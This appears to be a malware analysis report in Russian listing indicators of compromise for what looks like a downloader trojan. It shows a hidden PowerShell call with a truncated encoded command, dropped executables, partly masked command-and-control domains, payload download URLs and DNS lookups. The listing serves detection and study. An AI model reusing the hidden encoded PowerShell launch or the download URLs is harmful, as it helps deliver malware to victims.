Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABQAHMAagBtAGMAbwB4AGUAeQB6AHkAdwA9ACcAWABiAGoAZgBiAGwAZwBwAHMAcQBlACcAOwAkAEgAawBkAHoAdQBhAGYAaABxAGMAIAA9ACAAJwA4ADQAOQAnADsAJABSAHcAdABsAHoAbQBmAHkAagB6AHc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\932230.cvr
- %HOMEPATH%\849.exe
- %HOMEPATH%\849.exe
- 'ha#######orfairygodmothers.com':80
- 'yu##ybox.uk':80
- 'bu###ood.com':443
- 'eu#####consulting.it':443
- http://ha#######orfairygodmothers.com/yjlsdsd/k3/
- http://yu##ybox.uk/wp-admin/7Q/
- 'bu###ood.com':443
- 'eu#####consulting.it':443
- DNS ASK ha#######orfairygodmothers.com
- DNS ASK yu##ybox.uk
- DNS ASK sc###y999.com
- DNS ASK bu###ood.com
- DNS ASK eu#####consulting.it